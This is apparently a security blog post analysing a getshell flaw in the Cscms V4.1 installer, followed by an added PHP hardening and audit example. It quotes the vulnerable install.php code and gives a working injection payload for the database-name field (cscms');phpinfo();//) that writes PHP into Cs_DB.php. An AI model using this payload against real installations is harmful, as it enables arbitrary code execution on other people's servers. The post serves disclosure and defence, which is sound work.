色豹随心笔记

Cscms V4.1 getshell

Cscms is a multi-purpose content management system built on PHP5 + MySQL. In Cscms V4.1, install.php filters its input insufficiently, which leads to getshell (arbitrary PHP code written to a file on the server).

Vulnerability analysis:

In Cscms, /plugin/sys/install.php at line 154:

if(file_exists(FCPATH.'packs/install/install.lock')){
    exit('4');
}else{
    // Every installer parameter comes straight from the query string; rawurldecode() is the only processing
    $dbdriver = rawurldecode($_GET['dbdriver']);
    $dbhost = rawurldecode($_GET['dbhost']);
    $dbuser = rawurldecode($_GET['dbuser']);
    $dbpwd = rawurldecode($_GET['dbpwd']);
    $dbname = rawurldecode($_GET['dbname']);
    $dbprefix = rawurldecode($_GET['dbprefix']);
    if(is_numeric($dbname)) exit('6');   // the only check on dbname: it must not be purely numeric
    if(empty($dbdriver)) $dbdriver='mysql';
    if($dbdriver=='mysqli'){
        $mysqli = new mysqli($dbhost,$dbuser,$dbpwd);
        if(mysqli_connect_errno()){
            exit('2');
        }else{
            if(!$mysqli->select_db($dbname)){
                if(!$mysqli->query("CREATE DATABASE `".$dbname."`")){
                    exit('3');
                }
            }
            mysqli_select_db($dbname);
            // Modify the database configuration
            $this->load->helper('string');
            $CS_Encryption_Key='cscms_'.random_string('alnum',10);
            // Modify the database configuration file: each value is concatenated into the
            // replacement string unescaped, so whatever the user supplied becomes PHP source
            $config=read_file(CSCMS.'sys'.FGF.'Cs_DB.php');
            $config=preg_replace("/'CS_Sqlserver','(.*?)'/","'CS_Sqlserver','".$dbhost."'",$config);
            $config=preg_replace("/'CS_Sqlname','(.*?)'/","'CS_Sqlname','".$dbname."'",$config);
            $config=preg_replace("/'CS_Sqluid','(.*?)'/","'CS_Sqluid','".$dbuser."'",$config);
            $config=preg_replace("/'CS_Sqlpwd','(.*?)'/","'CS_Sqlpwd','".$dbpwd."'",$config);
            $config=preg_replace("/'CS_Dbdriver','(.*?)'/","'CS_Dbdriver','".$dbdriver."'",$config);
            $config=preg_replace("/'CS_SqlPrefix','(.*?)'/","'CS_SqlPrefix','".$dbprefix."'",$config);
            $config=preg_replace("/'CS_Encryption_Key','(.*?)'/","'CS_Encryption_Key','".$CS_Encryption_Key."'",$config);
            if(!write_file(CSCMS.'sys'.FGF.'Cs_DB.php', $config)) exit('5');
            // ... the rest of the method (including the non-mysqli branch) is not shown on the page
        }
    }
}

The code shows that dbname is not filtered at all (beyond the is_numeric check) and is written directly into the configuration file cscms/config/sys/Cs_DB.php. As a result, arbitrary PHP code can be written into that file.

Proof of concept: on the installation page, set the database name to cscms');phpinfo();//

(Screenshot: 1.png)

Then create the database and continue the installation. After installation, look at the configuration file cscms/config/sys/Cs_DB.php

(Screenshot: 2.png)

dbname has been written into the configuration file without any filtering.

Visit http://localhost/cscms/config/sys/Cs_DB.php

(Screenshot: 3.png)
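As an added example that is not part of the original post or of the Cscms code base, the following PHP shows a defensive version of the installer step analysed above, together with an audit that detects a Cs_DB.php into which code has already been written (using the payload from the proof above as the test input). It assumes that Cs_DB.php consists of define('CS_xxx','value'); lines, which is what the preg_replace() patterns and the payload imply; all function names and the sample configuration below are constructed for this example.

```php
<?php
// Added example, not Cscms project code. Assumption: Cs_DB.php is a sequence of
// define('CS_xxx','value'); statements. All function names are hypothetical.

// Database, user and table-prefix names: identifier characters only.
function cscms_safe_identifier(string $value, int $maxLen = 64): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_]{1,' . $maxLen . '}$/', $value);
}

// Host name or IPv4 address, optionally followed by :port.
function cscms_safe_host(string $value): bool
{
    return (bool) preg_match('/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/', $value);
}

// Check every installer parameter before anything is connected to or written.
// Returns a list of problems; an empty list means the parameters are acceptable.
function cscms_validate_install_params(array $p): array
{
    $errors = [];
    foreach (['dbname', 'dbuser', 'dbprefix'] as $k) {
        if (!cscms_safe_identifier($p[$k] ?? '')) {
            $errors[] = "$k: only letters, digits and underscore are allowed";
        }
    }
    if (!cscms_safe_host($p['dbhost'] ?? '')) {
        $errors[] = 'dbhost: not a valid host[:port]';
    }
    if (!in_array($p['dbdriver'] ?? 'mysql', ['mysql', 'mysqli'], true)) {
        $errors[] = 'dbdriver: unsupported driver';
    }
    return $errors;
}

// Replace one define('KEY','...') value. The new value is emitted through
// var_export(), so quotes and backslashes are escaped and cannot close the
// string literal; this matters for the password, which cannot be whitelisted.
// A callback is used so that "$1" or "\1" inside the value is never interpreted.
function cscms_set_define(string $config, string $key, string $value): string
{
    $literal = var_export($value, true);
    $pattern = "/'" . preg_quote($key, '/') . "','(.*?)'/";
    return preg_replace_callback($pattern, fn () => "'" . $key . "'," . $literal, $config);
}

// Audit: tokenize the config file and flag anything that is not part of a plain
// define('CS_...','...'); statement. Injected code such as a function call
// shows up as an unexpected T_STRING token, whatever name it uses.
function cscms_audit_config(string $config): array
{
    $allowedIds = [T_OPEN_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT, T_CONSTANT_ENCAPSED_STRING];
    $allowedChars = ['(', ')', ',', ';'];
    $findings = [];
    foreach (token_get_all($config) as $tok) {
        if (is_string($tok)) {
            if (!in_array($tok, $allowedChars, true)) {
                $findings[] = "unexpected token '$tok'";
            }
            continue;
        }
        [$id, $text, $line] = $tok;
        if ($id === T_STRING && $text === 'define') {
            continue;
        }
        if (!in_array($id, $allowedIds, true)) {
            $findings[] = sprintf('line %d: unexpected %s "%s"', $line, token_name($id), trim($text));
        }
    }
    return $findings;
}

// --- demonstration with constructed data ---
// Constructed stand-in for Cs_DB.php (not the real file's contents).
$template = "<?php\ndefine('CS_Sqlserver','localhost');\ndefine('CS_Sqlname','cscms');\ndefine('CS_Sqlpwd','');\n";

// The payload from the write-up is rejected by validation before any file is touched.
$params = ['dbname' => "cscms');phpinfo();//", 'dbuser' => 'root', 'dbprefix' => 'cscms_',
           'dbhost' => 'localhost', 'dbdriver' => 'mysqli'];
print_r(cscms_validate_install_params($params));

// A password containing quote characters is written as an escaped literal, not as code,
// and the audit of the resulting file reports nothing.
$hardened = cscms_set_define($template, 'CS_Sqlpwd', "p'w\"d");
echo $hardened;
print_r(cscms_audit_config($hardened));

// What the vulnerable installer produces when dbname is concatenated unescaped:
// the audit flags the injected function call.
$injected = str_replace("'cscms'", "'" . $params['dbname'] . "'", $template);
print_r(cscms_audit_config($injected));
```

Two layers are used on purpose. Identifier-like values (database, user, prefix) are validated against a strict character class, because nothing outside [A-Za-z0-9_] is needed for a MySQL name. The password cannot be restricted that way, so it is escaped with var_export() and inserted through a callback, which removes the two ways the original preg_replace() calls let input become source code: an unescaped quote closing the literal, and back-references in the replacement string. The audit is independent of the installer and is useful on an already-deployed site: any token outside the expected define()/string/punctuation set is a finding, so it does not depend on recognising a particular payload.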
